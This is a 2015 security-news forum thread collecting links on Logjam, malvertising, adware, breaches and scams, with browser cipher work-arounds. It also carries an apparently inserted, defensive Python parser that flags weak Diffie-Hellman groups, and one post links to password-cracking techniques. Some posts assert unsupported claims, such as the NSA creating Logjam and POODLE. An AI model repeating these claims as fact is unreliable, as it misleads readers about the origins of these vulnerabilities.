What more to expect after these NSA/FBI downgrading export operations, what comes after we experienced BEAST, POODLE, FREAK, Logjam?
polonus
P.S. Now ask yourselves why oh why servers like Apache are including export (weaker) cipher suites by default. :o
D
-
Login system supplies fake passwords to hackers
http://www.computerworld.com/article/2924114/security/login-system-supplies-fake-passwords-to-hackers.html
-
Exploit Kit authors give up on Malwarebytes users
https://blog.malwarebytes.org/exploits-2/2015/05/exploit-kit-authors-give-up-on-malwarebytes-users/?utm_source=Gplus&utm_medium=social
Another reason for layered protection.
-
Login system supplies fake passwords to hackers
http://www.computerworld.com/article/2924114/security/login-system-supplies-fake-passwords-to-hackers.html
Nice.
-
Good news:
Secret Google unit fights ad-fraud every day: http://adage.com/article/digital/inside-google-s-secret-war-ad-fraud/298652/ link article author = Alex Kantrowitz.
polonus
-
Bad news: fix for logjam makes many websites unreachable: http://www.engadget.com/2015/05/20/logjam-browser-vulnerability-fix/
So be aware when implementing the firefox work-around from MozillaZine's jscher2000:
Disable the insecure ciphers here:
(1) In a new tab, type or paste about:config in the address bar and press Enter. Click the button promising to be careful.
(2) In the search box above the list, type or paste ssl3 and pause while the list is filtered
(3) Double-click the security.ssl3.dhe_rsa_aes_128_sha preference to switch it from true to false (this usually would be the first item on the list)
(4) Double-click the security.ssl3.dhe_rsa_aes_256_sha preference to switch it from true to false (this usually would be the second item on the list)
That's it, you can test using: https://www.ssllabs.com/ssltest/viewMyClient.html
Alas, blocking JavaScript does not help, as the SSL RSA handshake does not require JavaScript.
Only IE11 seems patched. Test here: https://www.ssllabs.com/ssltest/viewMyClient.html
So for the moment do not use Firefox, Google Chrome, Sleipnir etc.
Also read here: https://groups.google.com/a/chromium.org/forum/#!topic/security-dev/Vnhy9aKM_l4
- some buggy servers may stop working and they really should be phased out!
polonus
-
Firefox is going to start showing ads based on one's browsing history: https://blog.mozilla.org/advancingcontent/2015/05/21/providing-a-valuable-platform-for-advertisers-content-publishers-and-users/
I like to keep blocking ads because I want to protect myself against malvertisers
and I am aware every 4 minutes new malware comes into this world.
polonus
-
Google Chrome logjam quick fix:
https://community.qualys.com/thread/15099
Info credits go to Jul Jones: he added a small compiled standalone batch file to load Chrome without the logjam vulnerability as well as other MiTM vulnerable ciphers
https://ssllocker.com/ChromeLocker.html (you have to fill in the captcha)
* Be aware there could be problems with some buggy https servers and services with weak ciphers you depend upon (banking etc.; for example PayPal needs to fix their SSL/TLS implementation, BUT Google should also discontinue RC4 ciphers in Chrome), so do not say that you weren't warned extensively before implementing this quick fix. Better to wait for the official patch from Google Chrome, but I wanted to give the work-arounds anyway to the g33ks.... (* my remarks: pol)
polonus
-
Adult Dating Site Members probably shared more than they bargained for. (http://www.channel4.com/news/adult-friendfinder-dating-hack-internet-dark-web)
AdultFriendFinder members have just gained some unwanted friends.....
-
uBlock the easiest adblocker to set to block malvertisements only:
http://thenextweb.com/opinion/2015/05/21/ad-blockers-arent-immoral-but-maybe-youre-using-them-wrong/
link article author = Dwen Williams
polonus
-
uBlock the easiest adblocker to set to block malvertisements only:
http://thenextweb.com/opinion/2015/05/21/ad-blockers-arent-immoral-but-maybe-youre-using-them-wrong/
link article author = Dwen Williams
polonus
Thanks. :)
-
NSA planned Google Play hack to target Android smartphones (http://www.zdnet.com/article/nsa-planned-google-play-hack-to-target-android-smartphones/)
So who needs Cyber Crooks ???
-
@bob3160,
The newly detected Logjam weakness was introduced by NSA to compromise VPN traffic.
Also POODLE allegedly came out of their labs.
polonus
-
Flawed Android Factory Reset Allows Recovery of Sensitive Data: Researchers
http://www.securityweek.com/flawed-android-factory-reset-allows-recovery-sensitive-data-researchers
This is scary. Too many people who don't know how to do proper reset.
-
Russia threatens to block Google, Twitter and Facebook if these services do not comply with Russian regulations:
http://www.theguardian.com/world/2015/may/22/russia-will-block-google-twitter-and-facebook-if-they-withhold-blogger-data
polonus
-
Browsers and servers should be patched against Logjam, the kissing cousin of POODLE!
Criminals on coffee-shop Wi-Fi networks are also abusing Logjam,
so it is not only state actors.
Firefox and Google Chrome we cannot wait weeks for this!
polonus
-
Fraud Can Happen Anytime, Anywhere, and to Anyone
https://blog.malwarebytes.org/online-security/2015/05/fraud-can-happen-anytime-anywhere-and-to-anyone/?utm_source=Gplus&utm_medium=social
Follow the directions to take the survey.
I got 15 out of 18.
At the end of the survey the Australian Federal Police (AFP) has a link about personal security.
The article by the AFP covers areas we talk about a lot here on the forums. It's worth going over again.
-
Interesting summary of Logjam's impact on IP and DNS: https://nohats.ca/wordpress/blog/2015/05/20/weakdh-and-ike-ipsec/
(article author = Paul Wouters).
And read this: http://cryptologie.net/article/270/the-logjam-attack/ (we need end to end security).
Somehow Google Chrome developers went for speed over security: TLS also provides an option for EDH: ephemeral Diffie-Hellman in a multiplicative group. We chose ECDHE because of the speed advantages: EDH in a 2048-bit group is plenty secure, but much slower.
polonus
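The Logjam posts above (weakdh.org, the browser work-arounds and this IKE/IPsec note) all come down to one thing a client can check: the size of the Diffie-Hellman group the server puts in its ServerKeyExchange. The parser below is an added example, not code from any of the linked articles; it reads the `ServerDHParams` triple (p, g, Ys) as laid out in RFC 5246 section 7.4.3 and classifies the modulus by bit length. The 512-bit modulus is a constructed stand-in, not a real group and not necessarily prime; the signature that follows the parameters in a real message is ignored.

```python
"""Parses the ServerDHParams (p, g, Ys) at the front of a TLS
ServerKeyExchange and classifies the group size, which is what Logjam
exploits: a client downgraded onto a 512-bit 'export' group. The sample
message is constructed with a made-up modulus."""
import struct
from typing import NamedTuple


class DHParams(NamedTuple):
    p: int
    g: int
    ys: int


def _vec(data: bytes) -> bytes:
    """opaque<1..2^16-1>: two-byte big-endian length, then the bytes."""
    return struct.pack("!H", len(data)) + data


def encode_server_dh_params(params: DHParams) -> bytes:
    def enc(n: int) -> bytes:
        return n.to_bytes((n.bit_length() + 7) // 8, "big")
    return _vec(enc(params.p)) + _vec(enc(params.g)) + _vec(enc(params.ys))


def parse_server_dh_params(msg: bytes) -> DHParams:
    """Read p, g, Ys; anything after them (the signature) is left alone."""
    vals, off = [], 0
    for _ in range(3):
        if off + 2 > len(msg):
            raise ValueError("truncated length field")
        (n,) = struct.unpack_from("!H", msg, off)
        off += 2
        if n == 0 or off + n > len(msg):
            raise ValueError("bad vector length")
        vals.append(int.from_bytes(msg[off:off + n], "big"))
        off += n
    return DHParams(*vals)


def dh_strength(params: DHParams) -> str:
    """Classify by modulus size; the thresholds follow the weakdh.org guidance."""
    bits = params.p.bit_length()
    if bits < 1024:
        return f"{bits}-bit: export-grade, breakable after a one-off precomputation"
    if bits < 2048:
        return f"{bits}-bit: weak, within reach of a nation-state attacker"
    return f"{bits}-bit: acceptable"


# Constructed 512-bit modulus: high bit set and odd, but only a stand-in.
FAKE_EXPORT_P = (1 << 511) + 0x1B
SAMPLE_SKE = encode_server_dh_params(
    DHParams(FAKE_EXPORT_P, 2, pow(2, 0xBEEF, FAKE_EXPORT_P)))

if __name__ == "__main__":
    parsed = parse_server_dh_params(SAMPLE_SKE)
    print(dh_strength(parsed))   # 512-bit: export-grade, ...
```

The client-side fix quoted earlier for Firefox (disabling the `dhe_rsa_aes_*` suites) works by refusing DHE entirely, which is blunt; a client that instead rejected any group under 1024 bits would keep DHE for well-configured servers, and that is the route the browser vendors took.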
-
UAC Phishing Attack: http://blog.cylance.com/trick-me-once-shameonuac
Link article author = Derek Soeder
polonus
-
Adware PUPs are getting nastier and more and more irritating - LSP hijackers with rootkit-elements start to resemble real malware - the distinctions grey out: https://blog.malwarebytes.org/security-threat/2015/05/fake-adblocker-bylekh-is-an-lsp-hijacker/ (link article author PIETER ARNTZ).
polonus
-
New POS malware - new Alina variant and others: https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html link article authors: Nart Villeneuve, Daniel Regalado.
polonus
-
IRS Statement on the "Get Transcript" Application
http://www.irs.gov/uac/Newsroom/IRS-Statement-on-the-Get-Transcript-Application
-
Tech Support Scammers Go For Pornographic Shocker
https://blog.malwarebytes.org/fraud-scam/2015/05/tech-support-scammers-go-for-pornographic-shocker/?utm_source=Gplus&utm_medium=social
BSides London: The Writey Writer’s Workshop
https://blog.malwarebytes.org/conferences/2015/05/bsides-london-the-writey-writers-workshop/?utm_source=Gplus&utm_medium=social
-
Security researchers hindered by strict export restrictions on 0-day exploits as dual-use technology.
0-days can only be acquired by governments.
New rules to restrict export of surveillance, hacking and intrusion software.
Robert Graham on this: http://blog.erratasec.com/2015/05/this-is-how-we-get-ants.html
"When you outlaw tools, outlaws are gonna use them" ;D
polonus
-
iPhone Crash: What You Need To Know
https://blog.malwarebytes.org/mobile-2/2015/05/iphone-crash-what-you-need-to-know/?utm_source=Gplus&utm_medium=social
Be careful with what you do with any smartphone at any time.
I use one free weather website and lo and behold there is a banner at the top "telling" me my phone is infected.
It even includes a "scan now" button. I figured it was a phishing ad and didn't tap scan. It isn't just malicious text(s)/email
one needs to worry about. Before you click/tap, ask yourself "is it worth the risk?" Do your research before you wish you had.
I do online scans on various websites and a lot of people would be shocked at the risks they are taking. A website may seem innocent,
but then again, "is it?" Always scan before you click. A "look before you leap" attitude is a must nowadays.
-
iPhone Crash: What You Need To Know
https://blog.malwarebytes.org/mobile-2/2015/05/iphone-crash-what-you-need-to-know/?utm_source=Gplus&utm_medium=social
Be careful with what you do with any smartphone at any time.
I use one free weather website and lo and behold there is a banner at the top "telling" me my phone is infected.
It even includes a "scan now" button. I figured it was a phishing ad and didn't tap scan. It isn't just malicious text(s)/email
one needs to worry about. Before you click/tap, ask yourself "is it worth the risk?" Do your research before you wish you had.
I do online scans on various websites and a lot of people would be shocked at the risks they are taking. A website may seem innocent,
but then again, "is it?" Always scan before you click. A "look before you leap" attitude is a must nowadays.
In your case, I'd question why a weather app wants to scan for malware and what a weather app contains that allows it to scan
my device to find a virus in the first place.
If an app requires more permissions than it needs to perform its function, don't install it.
As an example, if your flashlight app requires permission to access anything other than your camera, I wouldn't install it.
The flashlight function needs access to the flash function of your camera and therefore shouldn't need access to anything beyond that.
-
Hi bob3160,
I agree with what Para-Noid says, as we have seen mal-apps posing as genuine benevolent ones.
If you take certain things at face value you take a gigantic risk.
That is why I think it was bad that Google banned ad-blockers on Android in their function as mal-ad blockers.
The "secret" Google team hunts for fraudulent ad clicks, malvertisers et al., but they cannot catch up with all of it.
Moreover, the grey lines between adware/crapware and real persistent malware are becoming thinner and thinner.
We should be protected, at the least. Well, do as Para-Noid says: "Look hard before you leap".
Scan: http://mypermissions.org/
polonus
-
Command injection vulnerability in Synology Photo Station
https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html
-
iPhone Crash: What You Need To Know
https://blog.malwarebytes.org/mobile-2/2015/05/iphone-crash-what-you-need-to-know/?utm_source=Gplus&utm_medium=social
Apple comments on iOS 8 unicode crash bug, fix in the works
http://www.imore.com/unicode-rendering-bug-crashing-messages-lockscreen
-
Beware: Hola VPN turns your PC into an exit node and sells your traffic
http://www.ghacks.net/2015/05/28/beware-hola-vpn-turns-your-pc-into-an-exit-node-and-sells-your-traffic/
-
Scams Within Facebook Press On, Use “Facebook for Business” Hook
https://blog.malwarebytes.org/fraud-scam/2015/05/scams-within-facebook-press-on-use-facebook-for-business-hook/?utm_source=Gplus&utm_medium=social
-
Unusual Exploit Kit Targets Chinese Users (Part 1)
https://blog.malwarebytes.org/exploits-2/2015/05/unusual-exploit-kit-targets-chinese-users-part-1/?utm_source=Gplus&utm_medium=social
edit: Fixed missing URL :-[
-
TISA - overruling European local law, provided by lobbyists: https://www.eff.org/deeplinks/2015/05/tisa-yet-another-leaked-treaty-youve-never-heard-makes-secret-rules-internet
polonus
-
A "Zoo" on TLS attacks; Logjam and FREAK not yet included:
http://www.mitls.org/wsgi/tls-attacks
SSL certificate and configuration should be upgraded!
polonus
-
Keygen Capers and Suurgle Surveys
https://blog.malwarebytes.org/fraud-scam/2015/05/keygen-capers-and-suurgle-surveys/?utm_source=Gplus&utm_medium=social
-
Seized megaupload domains now in the hands of malcreants with links to scam ads and malware!
http://torrentfreak.com/seized-megaupload-domains-link-to-scam-ads-and-malware-150528/
link article author = Ernesto.
polonus
-
Buying a PC this year? Here’s what you need to know about bloatware
http://www.digitaltrends.com/computing/the-state-of-pc-bloatware-in-2015/
-
Buying a PC this year? Here’s what you need to know about bloatware
http://www.digitaltrends.com/computing/the-state-of-pc-bloatware-in-2015/
Posted a while back, a chart showing the biggest offenders:
https://forum.avast.com/index.php?topic=19387.msg1188015#msg1188015
-
Firefox is going to check downloads via Google Safe Browsing from version 39.
But other security measures should also be implemented: https://bugzilla.mozilla.org/show_bug.cgi?id=672600
polonus
-
Google Launches “My Account” Privacy and Security Aid
https://blog.malwarebytes.org/online-security/2015/06/google-launches-my-account-privacy-and-security-aid/?utm_source=Gplus&utm_medium=social
Techies rejoice, we’re partnering up with LabTech
https://blog.malwarebytes.org/news/2015/06/techies-rejoice-were-partnering-up-with-labtech/?utm_source=Gplus&utm_medium=social
-
“Download Virus” Email Comes with a Twist
https://blog.malwarebytes.org/online-security/2015/06/download-virus-email-comes-with-a-twist/?utm_source=Gplus&utm_medium=social
-
Locker ransomware dev decrypted everyone's files for free: (http://www.bleepingcomputer.com/forums/t/578182/today-locker-ransomware-dev-decrypted-everyones-files-for-free/?p=3723675)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1433358942857-53898.png)
-
Florida School Teacher Gets Jammin’
https://blog.malwarebytes.org/privacy-2/2015/06/florida-school-teacher-gets-jammin/?utm_source=Gplus&utm_medium=social
Fake UPS Email Leads to…Nikola Tesla and Bifilar Coils?!
https://blog.malwarebytes.org/online-security/2015/06/fake-ups-email-leads-to-nikola-tesla-and-bifilar-coils/?utm_source=Gplus&utm_medium=social
When Trolls Come in a Three-Piece Suit
https://blog.malwarebytes.org/social-engineering/2015/06/when-trolls-come-in-a-three-piece-suit/?utm_source=Gplus&utm_medium=social
Something we have all been guilty of at one time or another.
-
OPM to Notify Employees of Cybersecurity Incident
http://www.opm.gov/news/releases/2015/06/opm-to-notify-employees-of-cybersecurity-incident/
-
OPM to Notify Employees of Cybersecurity Incident
http://www.opm.gov/news/releases/2015/06/opm-to-notify-employees-of-cybersecurity-incident/
They are also supposed to offer them free credit monitoring :)
-
Evil Wi-Fi captive portal could spoof Apple Pay to get users’ credit card data
http://arstechnica.com/security/2015/06/evil-wifi-captive-portal-could-fool-users-into-giving-up-apple-pay-data/
-
Up, Down, Left, Right, Hack
https://blog.malwarebytes.org/privacy-2/2015/06/up-down-left-right-hack/?utm_source=Gplus&utm_medium=social
-
Scammers Exploit Alton Towers Crash with Fake YouTube Video
https://blog.malwarebytes.org/fraud-scam/2015/06/scammers-exploit-alton-towers-crash-with-fake-youtube-video/?utm_source=Gplus&utm_medium=social
edit: It's bad enough when there's a tragedy like the Alton Towers crash without some insensitive nitwit doing cr*p like this.
Families, friends and a whole nation grieve then some lame brain twit does this. If my anger shows, it shows because I want it to show.
-
Scammers Exploit Alton Towers Crash with Fake YouTube Video
https://blog.malwarebytes.org/fraud-scam/2015/06/scammers-exploit-alton-towers-crash-with-fake-youtube-video/?utm_source=Gplus&utm_medium=social
edit: It's bad enough when there's a tragedy like the Alton Towers crash without some insensitive nitwit doing cr*p like this.
Families, friends and a whole nation grieve then some lame brain twit does this. If my anger shows, it shows because I want it to show.
It unfortunately happens for just about every tragic event you can think of. :'(
-
Kaspersky's own system again infected with very sophisticated spyware:
http://www.nu.nl/internet/4065988/israel-tapte-gesprekken-rond-nucleair-akkoord-iran-af-met-spionagevirus.html
http://www.wsj.com/articles/spy-virus-linked-to-israel-targeted-hotels-used-for-iran-nuclear-talks-1433937601
http://www.wired.com/2015/06/kaspersky-finds-new-nation-state-attack-network/
-
Kaspersky's own system again infected with very sophisticated spyware:
http://www.nu.nl/internet/4065988/israel-tapte-gesprekken-rond-nucleair-akkoord-iran-af-met-spionagevirus.html
http://www.wsj.com/articles/spy-virus-linked-to-israel-targeted-hotels-used-for-iran-nuclear-talks-1433937601
http://www.wired.com/2015/06/kaspersky-finds-new-nation-state-attack-network/
Kaspersky Lab investigates hacker attack on its own network
https://blog.kaspersky.com/kaspersky-statement-duqu-attack/
-
Microsoft Security Bulletin Summary for June 2015
https://technet.microsoft.com/en-us/library/security/ms15-jun.aspx
-
Of Counterfeit Sites and Denali Jackets
https://blog.malwarebytes.org/fraud-scam/2015/06/of-counterfeit-sites-and-denali-jackets/?utm_source=Gplus&utm_medium=social
Another reason to "look before you leap".
Always pre-scan a site before clicking.
In Firefox I use "Scan URL with" add-on. "Scan URL with" has multiple ways to pre-scan a site.
-
Be Careful on your (Digital) Travels
https://blog.malwarebytes.org/hacking-2/2015/06/be-careful-on-your-digital-travels/?utm_source=Gplus&utm_medium=social
Draftback: Sensible Sharing Pays Off
https://blog.malwarebytes.org/privacy-2/2015/06/draftback-sensible-sharing-pays-off/?utm_source=Gplus&utm_medium=social
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
-
Unusual Exploit Kit Targets Chinese Users (Part 2)
https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-chinese-users-part-2/?utm_source=Gplus&utm_medium=social
Part 1 can be seen in reply #3735.
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
Most users have considered almost all toolbars as malware.
Users have three choices...
1) Read each screen during any install and untick what you don't want.
2) Use "Unchecky".
3) Worst case scenario...put up with a massive, and mostly unneeded, number of toolbars.
I know one guy who had ten (10), yes ten different toolbars on his computer. When I asked him, why?
He said he needed each one of them. After a little education I helped him knock it down to exactly one...his URL address bar.
Nowadays the address bar also serves as a search bar. What more do you need?
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
Most users have considered almost all toolbars as malware.
Users have three choices...
1) Read each screen during any install and untick what you don't want.
2) Use "Unchecky".
3) Worst case scenario...put up with a massive, and mostly unneeded, number of toolbars.
I know one guy who had ten (10), yes ten different toolbars on his computer. When I asked him, why?
He said he needed each one of them. After a little education I helped him knock it down to exactly one...his URL address bar.
Nowadays the address bar also serves as a search bar. What more do you need?
Toolbar collection ;D
http://www.brucebnews.com/wp-content/uploads/2012/03/toolbar-ieoverwhelmed.jpg
-
Security and privacy greatly ignored in the development of the IoT (Internet of Things).
Read: http://iotevent.eu/internet-of-things-event/john-matherly-shodan-aspects-of-the-iot-that-others-are-not-talking-about/
Just an example: mal-ads that cannot be easily blocked anymore, device-wide accounts that may be violated through AdMob for instance; just think of Gmail and Google as a corporation that won't comply with privacy regulations and the right to delete until they are forced to comply (EU), and then they also try to fight it or dig their heels in reluctantly. Re: http://www.huffingtonpost.com/2013/08/13/gmail-privacy_n_3751971.html
If users do not block what they cannot trust anymore, or ignore it out of sheer disinterest, they only have themselves to blame.
The mal-ad pushers don't mind and will go on with their cheap money gathering, no matter how it violates security and privacy.
polonus
-
Another security issue or a blessing?: http://www.nist.gov/itl/iad/201506_tattoo_workshop.cfm
polonus
-
They would have fun with my daughter-in-law. She has tattoos almost every where.
Most are really cool. Some not so cool.
Here in the USA prisons use tattoo recognition to determine gang affiliations to, hopefully, ward off any problems.
-
OpenSSL Security Advisory [11 Jun 2015]
https://www.openssl.org/news/secadv_20150611.txt
-
Complex Method of Obfuscation Found in Dropper RealShell
https://blog.malwarebytes.org/mobile-2/2015/06/complex-method-of-obfuscation-found-in-dropper-realshell/?utm_source=Gplus&utm_medium=social
-
Ask Toolbar latest version no longer detected by MS as malware: http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=BrowserModifier%3AWin32%2FAskToolbarNotifier&wa=wsignin1.0#tab=1
See: http://news.yahoo.com/microsoft-confirms-ask-toolbar-not-215800633.html
The toolbar comes bundled with all sorts of software and,
as it is not malicious per se, some may consider it adware or a PUP.
pol
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
Ask Toolbar latest version no longer detected by MS as malware: http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=BrowserModifier%3AWin32%2FAskToolbarNotifier&wa=wsignin1.0#tab=1
One step forward, two steps back... ::)
-
I still remove it, as the vast majority of people do not even know they have it
-
Yes, the way the flagellants moved.
See attached - MS self-punishment.
pol
-
Way to go pal, you're top-notch. :)
-
Warning: Don’t Download Software From SourceForge If You Can Help It
http://www.howtogeek.com/218764/warning-don%E2%80%99t-download-software-from-sourceforge-if-you-can-help-it/
This is news to me.
-
This is actually quite old. I would still trust SourceForge as, since that happened, there have been changes (more likely forced). Authors of existing software still being maintained/updated have to give permission to have any add-ons, I believe.
That said all users should apply the normal degree of caution when installing applications (custom install only) and you also have UnChecky to help prevent unwanted add-ons.
-
Hi DavidR,
We here are fully aware of the general threat of bundled goodies, PUPs, additional risk-, crap-, junk- and adware.
However the average unaware or disinterested user is eventually trapped as the avoidability of these marketed goodies to gain "cheap money" becomes harder and harder. The truth that freeware is being paid by giving up part of your privacy and by trading your personal data in some form of user contempt is not fully known, we here that deal with such abuse everyday know better, while we see that the balance is more and more slipping out of the users' hands. Worse is that hordes of users do not seem to mind at all and even seem to welcome this state of affairs while merrily clicking on in some form of apathy. ;D
polonus
-
The problem is that those who could really benefit from this topic aren't reading it as they A) probably don't know of its existence or B) are happy living in bliss (Ignorance is Bliss). Or what you don't know about or understand doesn't do you any harm.
-
The problem is that those who could really benefit from this topic aren't reading it as they A) probably don't know of its existence or B) are happy living in bliss (Ignorance is Bliss). Or what you don't know about or understand doesn't do you any harm.
David and/or Polonus, could you help taking them from ignorance (at least some of them) and write a blog article about this issue?
-
Those that attend my Avast sponsored presentations certainly get to know about this and many other dangers:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1434381543861-96525.png)
Attendees not only learn what to avoid but tools available to make avoidance easier. :)
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1434400555753-37615.png)
One down - 1000 to go ??? (http://www.pcworld.com/article/2935772/with-payroll-in-arrears-online-antivirus-seller-shuts-doors.html)
-
My dear Avast friends,
Do not forget about ever ongoing click-fraud mal-ad campaigns on the world wide web.
Present mal-ad campaign hits my country, the Netherlands: http://blog.fox-it.com/2015/06/15/large-malvertising-campaign-targeting-the-netherlands/
polonus
P.S. Bob, we know you are waking up your US user-base,
I hope that the wrinkles in this pond of awareness may grow and grow to wake up others...
D
-
Chinese websites vulnerable: https://en.wikipedia.org/wiki/JSONP#Security_concerns
Watering hole attack to detect the real identity of particular Chinese tor and VPN users:
https://www.alienvault.com/open-threat-exchange/blog/watering-holes-exploiting-jsonp-hijacking-to-track-users-in-china link article author = Jaime Blasco
polonus
-
LastPass was hacked, passwords should be changed: https://blog.lastpass.com/nl/2015/06/lastpass-security-notice.html/
polonus
-
is this your next password?
UK firm launches emoji alternative to Pin codes
http://www.bbc.com/news/technology-33063344
https://vimeo.com/130728753
https://vimeo.com/user25085293
-
They do follow up to make sure it was you who made the change:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1434466425164-73822.png)
-
L.S.
Security often stays a last resort issue. We sometimes see bug-sprints; we never ever see or experience security-sprints. In development it is always feature first (where the money can be made), security last, especially when a developer has not got the time to implement it properly, security goes out of the door! Privacy friendly tools are being built by humanitarian friendly developers via Random Hacks of Kindness, securing the code while passing it back to developers' hands. Geeks Without Bounds has such a project. The code is written by volunteers to protect user security. A noble initiative. Like to support this. You cannot say you are unaware of such an initiative...info credits go to Henk-Jan Buist
polonus (volunteer website security analyst and website error-hunter)
Only trust that code that you have tested yourself to be secure!
-
Life in the Days of Big Brother!
Are we going to need anti-recognition specs to be secure from facial recognition by government and corporations alike?
T-Mobile for instance to know when you are in the vicinity of their shop, so they will send you a message?
Read: http://www.washingtonpost.com/blogs/the-switch/wp/2015/06/16/the-governments-plan-to-regulate-facial-recognition-tech-is-falling-apart/
Push for Privacy Standards for Facial Recognition Falters
Read : http://abcnews.go.com/Technology/wireStory/push-privacy-standards-facial-recognition-falters-31791155
polonus
-
Hi bob3160,
Here you can read from a specialist how password hackers have an easy job when a certain phased strategy is applied:
https://www.praetorian.com/blog/statistics-will-crack-your-password-mask-structure
Markov chain attack: https://www.cs.utexas.edu/~tansey/passwords.pdf
4 years calculation time can be reduced to 40 minutes: https://hashcat.net/wiki/doku.php?id=mask_attack
Attacks on LastPass with scrapers and adders: https://digi.ninja/projects/cewl.php
Use of the Prince-algorithm: https://hashcat.net/events/p14-trondheim/prince-attack.pdf
Best line of defense for admins: https://en.wikipedia.org/wiki/Bcrypt
links from an article by Andreas Udo de Haes (info credits).
That is why the White House strives for other methods than passwords to go onto the Internet:
smart ID cards: https://www.whitehouse.gov/blog/2010/06/25/national-strategy-trusted-identities-cyberspace
link author Howard A. Smith.
polonus
-
@ Damien,
I suggest you read the following: http://blog.lumension.com/10249/lastpass-hack/?utm_source=Cluley&utm_campaign=10a4de2295-Graham_Cluley&utm_medium=email&utm_term=0_8106850f4a-10a4de2295-62385553
Not everything is always doom and gloom. And just because the White house strives for something, that doesn't mean much to me. :)
-
Hi bob3160,
We keep the security warnings well balanced then ;)
I keep the glass half empty and you for balance keep it half full. ;D
Couldn't it be better?
Damian
-
Report Phishing and get a reward ;) http://news.netcraft.com/phishing-report-competition/
-
Major zero-day security flaws in iOS & OS X allow theft of both Keychain and app passwords
http://9to5mac.com/2015/06/17/major-zero-day-security-flaws-in-ios-os-x-allow-theft-of-both-keychain-and-app-passwords/
-
10.000.000 dollar investment to render adblockers inoperable: http://www.prnewswire.com/news-releases/sourcepoint-introduces-the-first-content-compensation-platform-will-address-publisher-monetization-challenges-300101070.html
Adblockers help you to block malvertising ads, clickfraud etc.
Name of the game "either attention or dollars" - lost by the undermining workings of Adblockers.
But they never explored why users want to block certain unwanted - mainly third party - content; the user and security position is not even considered in this initiative. Features and ads bring money, security does also but is ignored by those that strive to circumvent/block/lame adblocking. I.m.h.o. script & request blocking developers will face a new need of defense, as will DNS and IP blocking tools. Keep content mal-ad free!
polonus
-
L.S.
Update on adblock nullifier initiatives - Report unblocked ad content here: http://forums.lanik.us/viewforum.php?f=62&sid=00bf6353e08623910d48974d11e1be67 EasyList forums.
I personally run this script from my Tampermonkey extension in Google Chrome: https://greasyfork.org/en/scripts/735-anti-adblock-killer-reek Anti-Adblock Killer is a userscript aiming to circumvent many protections used on some websites that force the user to disable AdBlockers. This way, you can continue to visit such websites without having to disable your Adblocker.
Damian
-
If they want me to see their ads then they can pay me.
It's my computer and I get to decide what I see or don't see.
If only it was that easy.
If a website "tells" me to disable my ad blocker to view their site, I go to a different site offering the same content/information/product.
I don't "have to" go to their website. I have other choices/options.
-
The Infosec Europe and BSides London Round-up
https://blog.malwarebytes.org/conferences/2015/06/the-infosec-europe-and-bsides-london-round-up/?utm_source=Gplus&utm_medium=social
AdChoices, interest based advertising
https://blog.malwarebytes.org/privacy-2/2015/06/adchoices-interest-based-advertising/?utm_source=Gplus&utm_medium=social
-
Heinz ketchup bottle QR code leads to hardcore porn site
www.theverge.com/2015/6/19/8811425/heinz-ketchup-qr-code-porn-site-fundorado
-
MalwareBytes acquires Junkware Removal Tool
http://www.majorgeeks.com/news/story/malwarebytes_acquires_junkware_removal_tool.html
-
New Exploitkit "Sundown" aims at user that has not updated Adobe Flash Player!
Adobe "the new Java" of our time!
Read: http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html
Analysis: https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-Beta-BEP
Info credits go to: Aditya Sood and Rohit Bansal
polonus
-
MalwareBytes acquires Junkware Removal Tool
http://www.majorgeeks.com/news/story/malwarebytes_acquires_junkware_removal_tool.html
Very interesting and looking forward how MBAM will incorporate this tool into their program. MBAM always keeps on getting better and better :)
-
Comics, a way to make users more security aware: http://www.littlebobbycomic.com/projects/week-17-encryption-and-me-1/
polonus
-
Dutch botnets aggressively attacking Norway & Sweden, read report:
http://www.level3.com/~/media/files/white-paper/en_secur_wp_botnetresearchreport.ashx
Behind the USA, Ukraine and Russia, the Netherlands is facilitating the fourth largest malbot infrastructure in the World.
polonus
-
Funny thing is we get an IDS alert like: "ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related" (Suricata IDS alert example), and read about country risk status on Zulu Zscaler scans for China, Russia, Ukraine, while the by far biggest malware spreading nation on earth, the U.S. of A., is never even mentioned. How about some biased risk rating?
polonus
-
MalwareBytes acquires Junkware Removal Tool
http://www.majorgeeks.com/news/story/malwarebytes_acquires_junkware_removal_tool.html
Here is the official press release (posted by malwarebytes.org)...
https://press.malwarebytes.org/2015/06/22/malwarebytes-acquires-junkware-removal-tool/?utm_source=blog&utm_medium=social
-
Popular Security Software Came Under Relentless NSA and GCHQ Attacks
https://firstlook.org/theintercept/2015/06/22/nsa-gchq-targeted-kaspersky/
NSA, GCHQ targeted Kaspersky, other cybersecurity companies – Snowden docs
http://rt.com/usa/268891-nsa-gchq-software-kaspersky/
-
Beyond Superfish: Turns out SSL-trashing spyware is widespread
https://gigaom.com/2015/02/23/beyond-superfish-turns-out-ssl-trashing-spyware-is-widespread/
One thing I noticed is this "quite a few software packages in the areas of antivirus and parental protection also use Komodia’s engine".
Hope Avast is not one of them? We would all very much appreciate it if one of the Avast Team confirms this. Could one of the forum members report this, so one of the Avast team can take a look at this, read it, and investigate if Avast antivirus is affected by the Komodia engine? Thanks!
-
Unpatched IE hole will not be patched by MS - circumventing ASLR-security,
demonstrated here: https://github.com/thezdi/abusing-silent-mitigations
